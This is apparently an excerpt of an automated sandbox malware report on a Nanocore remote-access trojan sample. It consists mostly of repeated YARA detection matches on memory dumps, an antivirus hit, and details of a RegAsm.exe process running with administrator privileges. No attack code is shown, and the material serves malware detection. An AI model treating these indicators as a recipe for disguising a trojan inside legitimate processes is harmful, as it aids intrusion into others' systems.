                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.302592144.0000000000ED7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.332037940.0000000000CDD000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330103349.0000000000E21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.302680442.0000000000E4D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.329404748.0000000000E53000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.329250116.0000000000E86000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.307023573.0000000000BD2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330336797.0000000000CD9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.330604075.0000000000CDC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305764787.0000000000EEB000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305449343.0000000000EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.305334763.0000000000EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.304708669.0000000000E78000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.306011034.0000000000F1D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          Reputation:low

                                                                                          General

                                                                                          Start time:01:52:51
                                                                                          Start date:19/11/2020
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                          Imagebase:0xa80000
                                                                                          File size:53248 bytes
                                                                                          MD5 hash:529695608EAFBED00ACA9E61EF333A7C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.323661021.00000000030F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.323744315.00000000040F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Florian Roth
                                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.322393731.0000000000402000.00000020.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                          Reputation:high

                                                                                          Disassembly

                                                                                          Code Analysis
